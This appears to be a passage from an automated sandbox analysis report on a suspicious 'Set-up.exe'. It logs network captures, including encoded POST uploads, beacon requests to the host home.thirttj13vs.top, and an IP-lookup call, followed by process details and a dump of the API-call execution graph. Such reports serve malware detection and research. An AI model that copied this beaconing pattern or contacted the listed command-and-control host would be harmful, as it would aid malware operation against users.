                              Jan 6, 2025 12:15:01.935271025 CET4944OUTData Raw: 7a 5c 2f 41 4d 54 50 45 6a 49 5c 2f 43 72 68 61 74 78 64 78 44 68 4d 32 78 6d 57 30 63 62 67 38 44 4b 68 6b 31 44 42 34 6a 48 4f 74 6a 5a 79 70 30 70 52 70 34 37 48 5a 64 51 64 4f 4c 69 33 55 62 78 4b 6b 6c 62 6c 68 4e 36 48 36 6e 34 52 65 46 48
                              Data Ascii: z\/AMTPEjI\/CrhatxdxDhM2xmW0cbg8DKhk1DB4jHOtjZyp0pRp47HZdQdOLi3UbxKklblhN6H6n4ReFHEfjRxlQ4H4XxuS4DNa+X4\/MYYjP8TjsLlyoZfThUrQlVy7Ls1xKqyjNKlFYRwk0+ecFq\/x0or+sNv+CM\/7G+SA3xcHJHHjrTv\/AGbwsaqv\/wAEaP2O8Aif4vjIPTxzpPbd\/e8In0r+cl9OXwmf\/NO+Iv8A
                              Jan 6, 2025 12:15:01.935305119 CET7416OUTData Raw: 70 6e 58 66 38 6b 6d 5c 2f 5c 2f 41 4a 35 78 2b 6e 50 2b 63 38 56 6b 64 46 50 72 38 76 31 4b 78 32 65 59 37 6a 5c 2f 74 6e 4a 47 4f 66 66 38 41 7a 39 50 70 54 59 74 38 6e 6b 5c 2f 77 4a 5c 2f 30 7a 34 5c 2f 7a 6e 5c 2f 50 46 53 74 6d 54 65 6e 5c
                              Data Ascii: pnXf8km\/\/AJ5x+nP+c8VkdFPr8v1Kx2eY7j\/tnJGOff8Az9PpTYt8nk\/wJ\/0z4\/zn\/PFStmTen\/kP\/H6\/54qHH8H8fleVL+6\/5d\/89PTFdBoQ+Zu\/2xJF+9+0f5\/w9qFjn27x8\/mfupR\/y3\/zx2\/nT5NhCJ\/HHLz5f5en+fxp8mdru\/yP\/wBM4v8AH8feg6Cm0fOzfH9f8\/p17VCxeTYmfx8r\/D\
                              Jan 6, 2025 12:15:01.935520887 CET9888OUTData Raw: 54 70 50 47 48 69 50 77 68 34 59 74 5c 2f 74 48 69 66 78 64 70 43 33 6c 35 72 66 69 58 53 4c 43 79 73 50 74 56 33 4e 64 66 75 52 48 4a 39 47 74 38 65 5c 2f 69 6d 66 2b 62 4b 66 32 6d 73 41 35 50 5c 2f 41 42 56 66 37 47 76 50 6f 50 38 41 6b 37 62
                              Data Ascii: TpPGHiPwh4Yt\/tHifxdpC3l5rfiXSLCysPtV3NdfuRHJ9Gt8e\/imf+bKf2msA5P\/ABVf7GvPoP8Ak7bH+favhz4IPn\/gmR+yZ1P\/ABe39kEY5x8v7f3wtHoB29a5X\/gop\/wVk0n9kX4m+APhJ8NtH0b4geL7HXdG8QfGu0uJy1v4e8CzDzD4O064tp0Wy8f+IbOVNUgur1bm28O6bFp815pmpf2\/D\/Z\/+K2X8D5tx
                              Jan 6, 2025 12:15:01.940032959 CET1236OUTData Raw: 34 6d 74 34 68 30 54 77 4a 72 58 78 50 38 56 66 43 72 78 4f 33 37 51 66 6a 33 78 56 42 2b 7a 68 2b 79 31 62 65 4c 76 46 58 67 33 34 33 33 6e 69 32 33 38 4b 36 39 38 41 39 5a 38 58 61 58 34 33 74 6b 30 76 52 76 41 6d 6f 79 33 6e 6a 36 79 38 52 58
                              Data Ascii: 4mt4h0TwJrXxP8VfCrxO37Qfj3xVB+zh+y1beLvFXg3433ni238K698A9Z8XaX43tk0vRvAmoy3nj6y8RXUfjXy4L3Q7T8owmFw2Bw2HwWCoUsLhMLRp4fDYehCNOjQo0oqFOlThFKMYQikopKySPpc7zvOOJc4zPiDiDMsbnOeZ1jsTmebZrmOIqYvH5jmGMqyr4rF4vE1pSqVq9erOU6k5ybbfayPp3\/gs7\/yjW\/aR\/wC
                              Jan 6, 2025 12:15:01.940114975 CET2472OUTData Raw: 76 78 7a 34 65 63 56 35 50 77 31 44 4d 35 38 53 35 74 6a 4d 73 7a 44 4c 70 59 72 4a 61 6d 45 6f 30 4d 63 73 33 79 4f 70 6e 57 49 70 34 6c 7a 66 31 66 38 41 74 48 4c 4d 73 69 38 5a 52 58 2b 7a 34 76 46 34 61 6c 69 70 30 76 72 74 53 65 49 6e 33 65
                              Data Ascii: vxz4ecV5Pw1DM58S5tjMszDLpYrJamEo0Mcs3yOpnWIp4lzf1f8AtHLMsi8ZRX+z4vF4alip0vrtSeIn3eBvgf408DeInCeccS1Mshw1lOEzLL8yjhc6p4utiMD\/AGRndPJcPUwygvrH9nZnmclg6ztiMJhMRVwsKqwVOnh4\/wAZ+vKG13Wm5+bVtRb87yY+lYWZP73+fyrc1g7tX1U+upXx\/O5lNZEjY\/Dk\/Xt\/n3r\/
                              Jan 6, 2025 12:15:01.940217018 CET3708OUTData Raw: 66 58 39 63 2b 47 66 78 7a 38 59 66 73 6e 36 4a 71 32 72 66 46 72 34 57 65 42 76 42 74 6e 34 75 30 4c 78 6a 63 61 68 63 61 78 34 6a 5c 2f 5a 33 47 70 54 32 48 5c 2f 43 50 5c 2f 73 2b 66 46 72 78 50 71 38 35 62 78 68 64 61 70 6f 64 39 5c 2f 77 41
                              Data Ascii: fX9c+Gfxz8Yfsn6Jq2rfFr4WeBvBtn4u0Lxjcahcax4j\/Z3GpT2H\/CP\/s+fFrxPq85bxhdapod9\/wAJR8H9Rh1HW\/iXYfDyw+yfFvTYrRvAnxI+Jf3LXm\/wo+FHgz4L+DLHwP4HsbqDTYLq\/wBW1XVdWv7rWvFHi3xRrV0+oeJPGnjTxJqDzar4p8ZeKdVmuNW8ReItWnnv9Tv55JZZFjWKKP0iuvE1FUlTvUliKsKfJ
                              Jan 6, 2025 12:15:01.940340996 CET2472OUTData Raw: 4d 63 4c 4a 53 77 2b 5a 5a 58 57 78 32 58 59 33 44 7a 62 56 6e 52 78 6d 45 6c 52 72 30 5a 4e 38 74 6e 43 70 46 74 32 74 30 50 74 62 77 7a 2b 32 6e 38 57 74 45 30 36 66 53 74 57 75 59 5c 2f 45 6c 68 50 61 79 57 72 4a 65 79 43 4f 62 44 6f 55 44 5c
                              Data Ascii: McLJSw+ZZXWx2XY3DzbVnRxmElRr0ZN8tnCpFt2t0Ptbwz+2n8WtE06fStWuY\/ElhPayWrJeyCObDoUD\/aJ4L9k8vOVitRawgfKYyAu3wzxR8WfGHi15Vv9TuIrGQtjT45mgtAh6JJDAIYJto4EkkO\/rliWbd5NoGpaT4p8ZfD\/wAB6J4h8Lt4h+JfxB8F\/DTw0L\/XIoNPHiPx3r9j4b0RtRm0+DVb6GwXUdQga8ls9Mv
                              Jan 6, 2025 12:15:01.984366894 CET27192OUTData Raw: 75 7a 31 53 31 38 47 48 77 31 38 55 66 44 56 36 6b 56 33 70 38 50 6a 75 77 75 59 74 59 30 6a 58 76 41 32 6a 61 78 70 7a 57 45 75 6e 44 6e 43 58 30 58 75 48 63 58 50 44 5a 62 68 2b 46 73 7a 78 57 4a 7a 62 41 5a 6c 67 4d 62 6a 6f 56 4f 49 4b 32 58
                              Data Ascii: uz1S18GHw18UfDV6kV3p8PjuwuYtY0jXvA2jaxpzWEunDnCX0XuHcXPDZbh+FszxWJzbAZlgMbjoVOIK2XYzF4bKa2WZdlfElXC4rEUIVacsrzHC5ZUzatWk8dRxcYOljKLl6XFXiB9NPivLY1M0x3G2T5dhckzLLc1ynLMTDhbC5xgsvrZ3DNc5zzg2jjMHhMVXoWzfK8VnVPIqFCMMBXy\/wBqq2ErQXUIgjUKu7A\/vMzn8W
                              Jan 6, 2025 12:15:02.031903028 CET13596OUTData Raw: 66 5c 2f 41 45 37 6e 70 5c 2f 6e 38 5c 2f 65 67 44 59 2b 33 37 34 5c 2f 35 35 66 72 5c 2f 6b 64 50 61 6d 66 37 66 33 50 31 5c 2f 7a 5c 2f 77 44 57 7a 37 30 38 53 66 63 59 66 75 59 66 4e 38 72 79 5c 2f 66 38 41 7a 2b 64 4d 32 66 4b 36 49 2b 7a 79
                              Data Ascii: f\/AE7np\/n8\/egDY+374\/55fr\/kdPamf7f3P1\/z\/wDWz708SfcYfuYfN8ry\/f8Az+dM2fK6I+zy\/wDW5\/z\/APrNB0BLI\/74J5f\/ADy\/z3PpRuSNXg3yb\/Nt\/KMf+f8AJx0pkn73fsff+Pf\/AD\/n1fNI7bPnjdP84\/l\/nNT7Lyl93\/AAZM3zZk+V45f3v2j\/AJY\/09frUP8Au\/I\/mnyvL\/1H9Km
                              Jan 6, 2025 12:15:02.079664946 CET1236OUTData Raw: 38 44 36 35 46 4d 5c 2f 31 69 37 33 66 66 35 6e 58 4a 35 6d 35 5c 2f 6e 5c 2f 51 38 47 68 76 39 59 6d 39 50 6b 35 6c 5c 2f 64 5c 2f 36 6a 6e 72 5c 2f 41 4a 5c 2f 6c 6d 68 6c 2b 56 66 38 41 56 37 34 2b 50 33 66 72 7a 51 61 55 2b 76 79 5c 2f 55 47
                              Data Ascii: 8D65FM\/1i73ff5nXJ5m5\/n\/Q8Ghv9Ym9Pk5l\/d\/6jnr\/AJ\/lmhl+Vf8AV74+P3frzQaU+vy\/UG3\/AMGUf\/SIv3f7iD\/wE6+tKqvu\/cvvf\/VfvPx9Pr+H1pPkk+d02fuvJl9eP\/r\/AK1W+f8A6aJ5mZfp2\/z19Peg0P3o2D3\/AM\/hXkPx0dk+EXxBKkgnwtrSHHGVfT7hWB9iCQRXrvO\/8f0x\/PH615F
                              Jan 6, 2025 12:15:05.263189077 CET138INHTTP/1.1 200 OK
                              server: nginx/1.22.1
                              date: Mon, 06 Jan 2025 11:15:05 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1
                              Data Raw: 30
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.44973334.147.147.173806512C:\Users\user\Desktop\Set-up.exe
                              TimestampBytes transferredDirectionData
                              Jan 6, 2025 12:15:05.822952986 CET100OUTGET /gbVspuhpvozlydclqfRi1736138767?argument=0 HTTP/1.1
                              Host: home.thirttj13vs.top
                              Accept: */*
                              Jan 6, 2025 12:15:06.439994097 CET353INHTTP/1.1 404 NOT FOUND
                              server: nginx/1.22.1
                              date: Mon, 06 Jan 2025 11:15:06 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 207
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                              Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.44973434.147.147.173806512C:\Users\user\Desktop\Set-up.exe
                              TimestampBytes transferredDirectionData
                              Jan 6, 2025 12:15:07.267832041 CET173OUTPOST /gbVspuhpvozlydclqfRi1736138767 HTTP/1.1
                              Host: home.thirttj13vs.top
                              Accept: */*
                              Content-Type: application/json
                              Content-Length: 31
                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                              Data Ascii: { "id1": "0", "data": "Done1" }
                              Jan 6, 2025 12:15:07.976244926 CET353INHTTP/1.1 404 NOT FOUND
                              server: nginx/1.22.1
                              date: Mon, 06 Jan 2025 11:15:07 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 207
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                              Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.44973050.19.58.1134436512C:\Users\user\Desktop\Set-up.exe
                              TimestampBytes transferredDirectionData
                              2025-01-06 11:14:58 UTC52OUTGET /ip HTTP/1.1
                              Host: httpbin.org
                              Accept: */*
                              2025-01-06 11:14:59 UTC224INHTTP/1.1 200 OK
                              Date: Mon, 06 Jan 2025 11:14:59 GMT
                              Content-Type: application/json
                              Content-Length: 31
                              Connection: close
                              Server: gunicorn/19.9.0
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Credentials: true
                              2025-01-06 11:14:59 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                              Data Ascii: { "origin": "8.46.123.189"}


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:06:14:56
                              Start date:06/01/2025
                              Path:C:\Users\user\Desktop\Set-up.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Set-up.exe"
                              Imagebase:0x110000
                              File size:7'745'160 bytes
                              MD5 hash:82F12257874F42D2F2475CA1D9189E43
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:1.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:26.6%
                                Total number of Nodes:1551
                                Total number of Limit Nodes:79
                                execution_graph 95065 114810 96 API calls 95066 132410 108 API calls 95221 133610 53 API calls 95223 348630 qsort 95224 266220 36 API calls 95067 176810 21 API calls 95068 111001 _set_app_type __p__fmode __p__commode _set_app_type __setusermatherr 94043 631870 94062 49dd50 94043->94062 94046 6318a6 94051 6318e6 94052 498f70 8 API calls 94053 6318ef GetVersion CryptAcquireContextA 94052->94053 94054 631990 GetLastError __acrt_iob_func 94053->94054 94055 631946 CryptGenRandom CryptReleaseContext 94053->94055 94080 49b500 42 API calls 94054->94080 94056 6319d0 GetLastError __acrt_iob_func 94055->94056 94057 631984 94055->94057 94081 49b500 42 API calls 94056->94081 94059 6319b9 _time32 94061 6319f9 94061->94059 94082 4a7430 __acrt_iob_func 94062->94082 94064 49dd61 94065 49d1d0 32 API calls 94064->94065 94066 49dd89 94065->94066 94086 4a74a0 __acrt_iob_func 94066->94086 94068 49dd93 94068->94046 94069 498f70 94068->94069 94091 498e90 _open 94069->94091 94071 498f82 94072 498e90 8 API calls 94071->94072 94073 498fa2 94072->94073 94074 498f70 8 API calls 94073->94074 94075 498fb8 94074->94075 94076 4a12c0 94075->94076 94077 4a12cc 94076->94077 94104 49e050 94077->94104 94079 4a12fa 94079->94051 94079->94052 94080->94059 94081->94061 94083 4a7458 EnterCriticalSection 94082->94083 94084 4a7448 __acrt_iob_func 94082->94084 94083->94064 94084->94083 94085 4a7470 __acrt_iob_func _lock 94084->94085 94085->94064 94087 4a74c8 LeaveCriticalSection 94086->94087 94088 4a74b8 __acrt_iob_func 94086->94088 94087->94068 94088->94087 94089 4a74e0 __acrt_iob_func 94088->94089 94090 4a7ad0 _unlock 94089->94090 94093 498eba 94091->94093 94092 498ef3 _exit 94092->94093 94093->94092 94094 63b5a0 94093->94094 94095 498f39 _write 94093->94095 94098 498f53 _close 94093->94098 94096 63b5ba CryptAcquireContextA 94094->94096 94097 63b5b9 94094->94097 94095->94093 94095->94098 94099 63b5f1 94096->94099 94100 63b609 CryptGenRandom 94096->94100 94097->94071 94098->94093 94099->94071 94101 63b636 CryptReleaseContext 94100->94101 94102 63b62d 94100->94102 94101->94099 94102->94101 94103 63b64d CryptReleaseContext 94102->94103 94103->94099 94105 49e09d localeconv localeconv 94104->94105 94106 49f886 _errno 94104->94106 94138 49e0ce 94105->94138 94179 49e503 94106->94179 94107 49f993 94111 49f9b5 realloc 94107->94111 94154 49e214 94107->94154 94108 49e300 strlen 94205 4a7a50 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 94108->94205 94110 49e146 isspace 94110->94138 94111->94154 94112 49e28c 94115 49e2d1 94112->94115 94119 49e2c0 free 94112->94119 94113 49f674 94128 49f6b0 free 94113->94128 94113->94154 94203 49e1e1 94113->94203 94114 49e176 isspace 94114->94138 94120 49e2f1 free 94115->94120 94121 49e2e1 free 94115->94121 94116 49f54c 94132 4a0250 ungetc 94116->94132 94133 49f564 94116->94133 94117 49e18e 94124 49ed90 ungetc 94117->94124 94125 49e1a6 94117->94125 94118 49e243 94118->94112 94129 49e261 isspace 94118->94129 94119->94115 94119->94119 94120->94154 94121->94120 94122 4a0178 94136 4a0184 free 94122->94136 94122->94203 94123 49f603 94135 49f630 free 94123->94135 94123->94154 94123->94203 94124->94154 94137 49e1d0 free 94125->94137 94125->94203 94126 49e1f1 free 94127 49e205 free 94126->94127 94127->94154 94128->94128 94128->94203 94129->94118 94181 49e26f 94129->94181 94130 49e388 94131 49f5b6 94130->94131 94149 49e4b0 94130->94149 94148 49f5d0 free 94131->94148 94131->94203 94139 4a0274 strtoul 94132->94139 94147 49f5a0 free 94133->94147 94133->94154 94133->94203 94134 49ecc8 _errno _errno 94134->94149 94135->94135 94135->94203 94136->94136 94136->94203 94137->94137 94137->94203 94138->94108 94138->94110 94138->94113 94138->94114 94138->94116 94138->94117 94138->94118 94138->94130 94144 49e560 isspace 94138->94144 94145 49e582 94138->94145 94138->94179 94139->94154 94139->94179 94140 49fed7 tolower 94140->94154 94140->94179 94141 49eb52 94159 49eb63 94141->94159 94160 49e81a 94141->94160 94142 49ed17 _errno 94142->94123 94142->94149 94143 49feb6 isxdigit 94143->94179 94144->94138 94145->94154 94157 49e5a0 free 94145->94157 94145->94203 94146 4a0742 ungetc 94146->94112 94147->94147 94147->94203 94148->94148 94148->94203 94149->94122 94149->94123 94149->94134 94149->94141 94149->94142 94150 49ed02 isspace 94149->94150 94152 49e527 94149->94152 94158 49e6b9 94149->94158 94162 4a00b8 ungetc 94149->94162 94149->94179 94150->94149 94156 49e626 _errno 94150->94156 94151 4a11a4 ungetc 94151->94179 94165 49e538 free 94152->94165 94152->94203 94153 49e765 94153->94154 94169 4a08f9 94153->94169 94153->94179 94154->94079 94155 4a03d9 tolower 94155->94179 94156->94149 94157->94157 94157->94203 94158->94153 94158->94154 94167 49e701 malloc 94158->94167 94158->94179 94159->94154 94163 49ebac malloc 94159->94163 94159->94179 94160->94154 94164 49e86d malloc 94160->94164 94160->94179 94161 4a0438 tolower 94161->94154 94161->94179 94162->94149 94163->94154 94170 49ebd2 94163->94170 94164->94154 94172 49e897 94164->94172 94165->94165 94165->94203 94166 49ea53 malloc 94166->94154 94185 49e8c7 94166->94185 94167->94154 94175 49e71f 94167->94175 94168 4a08d7 ungetc 94168->94179 94169->94154 94184 4a0911 free 94169->94184 94169->94203 94177 49ebe6 malloc 94170->94177 94170->94185 94171 4a0927 94171->94154 94178 4a0958 free 94171->94178 94171->94203 94180 49e8ab malloc 94172->94180 94172->94185 94173 49e96f realloc 94173->94179 94174 49eb2d isspace 94174->94179 94183 49e733 malloc 94175->94183 94187 49e74f 94175->94187 94176 49e7ac isspace 94176->94179 94177->94185 94178->94178 94178->94203 94179->94106 94179->94107 94179->94113 94179->94132 94179->94139 94179->94140 94179->94143 94179->94151 94179->94152 94179->94154 94179->94155 94179->94161 94179->94166 94179->94168 94179->94171 94179->94173 94179->94174 94179->94176 94179->94181 94186 4a0e3e ungetc 94179->94186 94188 4a78b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 94179->94188 94189 49f293 strtoll 94179->94189 94190 49fc5e strtol 94179->94190 94192 4a0e5d realloc 94179->94192 94193 4a0d20 _errno 94179->94193 94194 49ec9a realloc 94179->94194 94195 4a0006 ungetc 94179->94195 94196 4a0054 realloc 94179->94196 94197 49fc10 realloc 94179->94197 94198 49ed2c _errno 94179->94198 94199 49ed5e _errno 94179->94199 94206 49b1a0 7 API calls 94179->94206 94180->94185 94181->94112 94181->94146 94182 49ea85 malloc 94182->94185 94183->94187 94184->94184 94184->94203 94185->94179 94185->94182 94186->94179 94187->94153 94188->94179 94189->94154 94189->94179 94190->94154 94190->94179 94192->94179 94193->94179 94194->94179 94195->94179 94196->94179 94197->94179 94200 49ed43 94198->94200 94198->94203 94202 49ed75 94199->94202 94199->94203 94201 49ed48 free 94200->94201 94201->94201 94201->94203 94204 49ed78 free 94202->94204 94203->94126 94203->94127 94204->94203 94204->94204 94205->94138 94206->94179 94239 14e400 94240 14e412 94239->94240 94246 14e459 94239->94246 94241 14e422 94240->94241 94270 163030 50 API calls 94240->94270 94271 1709d0 50 API calls 94241->94271 94244 14e42b 94272 1468b0 58 API calls 94244->94272 94245 14e4a8 94246->94245 94249 14e495 94246->94249 94251 14b5a0 94246->94251 94249->94245 94250 14b5a0 54 API calls 94249->94250 94250->94245 94252 14b5c0 94251->94252 94253 14b5d2 94251->94253 94252->94253 94254 12d8c0 2 API calls 94252->94254 94253->94249 94255 14b5f2 94254->94255 94256 14b611 94255->94256 94257 14b638 94255->94257 94273 14ec70 QueryPerformanceCounter GetTickCount 94256->94273 94274 14ec10 QueryPerformanceCounter GetTickCount 94257->94274 94260 14b61b 94261 14b713 94260->94261 94264 14b626 94260->94264 94276 154f40 52 API calls 94261->94276 94263 14b65a 94263->94253 94265 14b72b 94263->94265 94266 14b737 94263->94266 94264->94253 94264->94263 94264->94265 94264->94266 94275 1550a0 51 API calls 94264->94275 94265->94253 94277 1550a0 51 API calls 94265->94277 94266->94253 94278 1550a0 51 API calls 94266->94278 94270->94241 94271->94244 94272->94246 94273->94260 94274->94264 94275->94264 94276->94253 94277->94253 94278->94253 95070 341c20 61 API calls 95071 162c00 100 API calls 95225 1c2600 memcpy _assert 95226 120e0d 54 API calls 95072 116c30 178 API calls 95073 111830 50 API calls 95074 119830 86 API calls 95227 32fa10 153 API calls 95228 15d630 166 API calls 95077 160030 94 API calls 95229 49ba60 6 API calls 95231 2f0200 30 API calls 95232 1fee30 298 API calls 95233 115220 112 API calls 95079 137c20 85 API calls 95234 132e20 88 API calls 95081 27f810 26 API calls 95235 2e2e10 59 API calls 95082 115850 83 API calls 95083 238060 free 95087 147050 44 API calls 95237 162250 53 API calls 95238 169250 53 API calls 95088 18bc50 370 API calls 95089 111441 _cexit 95091 469c10 17 API calls 95092 289c70 21 API calls 95242 494610 43 API calls 95093 37dc6c 6 API calls 95243 2d5670 63 API calls 95244 305650 memcmp 94631 638600 calloc 94632 638625 calloc 94631->94632 94634 638640 94631->94634 94633 63869c free 94632->94633 94632->94634 94633->94634 95095 338050 60 API calls 95096 498820 __stdio_common_vsprintf 95249 1eaa70 memcmp memcmp memcmp 95098 308040 118 API calls 95251 21da50 68 API calls 95253 494230 free free free free 95099 113c6b 52 API calls 95255 2b9a50 41 API calls 95101 1fb060 strlen memcpy 95256 2f2a50 22 API calls 95105 33acb0 37 API calls 93416 149290 93433 1176a0 93416->93433 93419 1493c3 WSAGetLastError 93421 1493e5 93419->93421 93428 149392 93419->93428 93420 1492f3 93420->93428 93447 12d8c0 93420->93447 93451 12d090 66 API calls 93421->93451 93422 1493be 93425 14930b 93425->93428 93429 149335 WSAIoctl 93425->93429 93426 1493f7 93452 154f40 52 API calls 93426->93452 93428->93422 93453 1550a0 51 API calls 93428->93453 93429->93428 93431 149366 93429->93431 93431->93428 93432 149371 setsockopt 93431->93432 93432->93428 93434 1176c0 93433->93434 93435 1176e6 send 93433->93435 93434->93435 93436 1176c9 93434->93436 93437 1176f4 93435->93437 93438 11775e 93435->93438 93439 1176d3 send 93436->93439 93440 11770b 93436->93440 93454 1172a0 50 API calls 93437->93454 93438->93419 93438->93420 93439->93437 93455 1172a0 50 API calls 93440->93455 93442 117704 93442->93438 93444 11771c __acrt_iob_func 93456 11cb20 78 API calls 93444->93456 93446 11773c fflush _errno 93446->93438 93448 12d968 GetTickCount 93447->93448 93449 12d8dd QueryPerformanceCounter 93447->93449 93450 12d913 93448->93450 93449->93450 93450->93425 93451->93426 93452->93428 93453->93422 93454->93442 93455->93444 93456->93446 95106 147090 strlen memcpy EnterCriticalSection 95107 26eca0 21 API calls 95258 111296 7 API calls 95259 282ea0 32 API calls 95108 297ca0 43 API calls 95260 1b8a90 memcpy _byteswap_uint64 95262 1fc290 299 API calls 94279 149480 94292 117770 94279->94292 94282 1494df WSAGetLastError 94283 1494fb 94282->94283 94288 1494c9 94282->94288 94306 12d090 66 API calls 94283->94306 94284 1494da 94285 149589 94284->94285 94289 12d8c0 2 API calls 94284->94289 94287 14950f 94307 154f40 52 API calls 94287->94307 94288->94284 94308 1550a0 51 API calls 94288->94308 94289->94285 94293 117790 94292->94293 94294 1177b6 recv 94292->94294 94293->94294 94295 117799 94293->94295 94296 1177c4 94294->94296 94297 11782e 94294->94297 94298 1177a3 recv 94295->94298 94299 1177db 94295->94299 94309 1172a0 50 API calls 94296->94309 94297->94282 94297->94288 94298->94296 94310 1172a0 50 API calls 94299->94310 94301 1177d4 94301->94297 94303 1177ec __acrt_iob_func 94311 11cb20 78 API calls 94303->94311 94305 11780c fflush _errno 94305->94297 94306->94287 94307->94288 94308->94284 94309->94301 94310->94303 94311->94305 95263 113686 132 API calls 95264 28a2b0 55 API calls 95265 2826b0 24 API calls 95267 1b7280 _assert 95111 306490 58 API calls 94555 113ab0 AcquireSRWLockExclusive 94556 113ac3 94555->94556 94557 113acb ReleaseSRWLockExclusive 94555->94557 94556->94557 94558 113ad6 94556->94558 94562 12d7b0 94558->94562 94560 113aeb 94561 113af3 ReleaseSRWLockExclusive 94560->94561 94563 12d7d9 94562->94563 94564 12d7be FreeLibrary 94562->94564 94565 12d7e0 WSACleanup 94563->94565 94566 12d7de 94563->94566 94564->94563 94566->94560 94659 146ab0 94669 1d0870 EnterCriticalSection LeaveCriticalSection 94659->94669 94661 146bb4 94663 1c5ed0 91 API calls 94661->94663 94662 146ad5 94662->94661 94664 126fa0 9 API calls 94662->94664 94665 146ba9 94663->94665 94666 146b54 94664->94666 94666->94661 94666->94665 94667 146b5d 94666->94667 94667->94665 94670 1c5ed0 94667->94670 94669->94662 94673 1c5a50 94670->94673 94674 1c5a58 94673->94674 94675 1c5ea9 94673->94675 94708 1d86d0 EnterCriticalSection 94674->94708 94675->94667 94677 1c5a71 94678 1d88b0 2 API calls 94677->94678 94679 1c5a7e 94678->94679 94680 1c5a99 94679->94680 94682 1c5b50 94679->94682 94694 1c5b88 94679->94694 94713 1cd920 memset 94680->94713 94687 1c5b7a 94682->94687 94688 1c5eb4 94682->94688 94682->94694 94683 1c5e96 94750 1d9480 QueryPerformanceFrequency QueryPerformanceCounter closesocket 94683->94750 94685 1c5ea0 94751 1d86f0 LeaveCriticalSection 94685->94751 94715 1c70a0 94687->94715 94691 1c6f10 82 API calls 94688->94691 94689 1c5b9e 94725 1cda40 memmove 94689->94725 94695 1c5ec2 94691->94695 94697 1c5cae 94694->94697 94742 1c6d50 44 API calls 94694->94742 94695->94695 94696 1c5be2 __WSAFDIsSet 94700 1c5bac 94696->94700 94697->94683 94699 1c5da1 __WSAFDIsSet 94697->94699 94705 1c5d3f WSAGetLastError 94697->94705 94709 1da920 94697->94709 94743 1c6d50 44 API calls 94697->94743 94744 1d9320 94697->94744 94698 1c5aa2 94698->94689 94698->94694 94714 1cdc70 memset memmove memmove memset 94698->94714 94699->94697 94700->94694 94700->94696 94703 1c70a0 82 API calls 94700->94703 94726 1c6f10 94700->94726 94703->94700 94705->94697 94708->94677 94710 1da944 94709->94710 94711 1da94b 94710->94711 94712 1da977 send 94710->94712 94711->94697 94712->94697 94713->94698 94714->94698 94723 1c70ae 94715->94723 94716 1c717f WSAGetLastError 94718 1c718b 94716->94718 94719 1c71a7 94718->94719 94790 1c6d50 44 API calls 94718->94790 94719->94694 94721 1c719f 94722 1d9320 3 API calls 94721->94722 94722->94719 94723->94716 94723->94719 94752 1da8c0 94723->94752 94756 1c71c0 94723->94756 94725->94700 94727 1d6050 memmove 94726->94727 94728 1c6f35 94727->94728 94729 1c7019 94728->94729 94805 1da870 94728->94805 94732 1d9320 3 API calls 94729->94732 94731 1c6f4e 94733 1c702d 94731->94733 94738 1c6f61 94731->94738 94737 1c701d 94732->94737 94734 1c705d WSAGetLastError 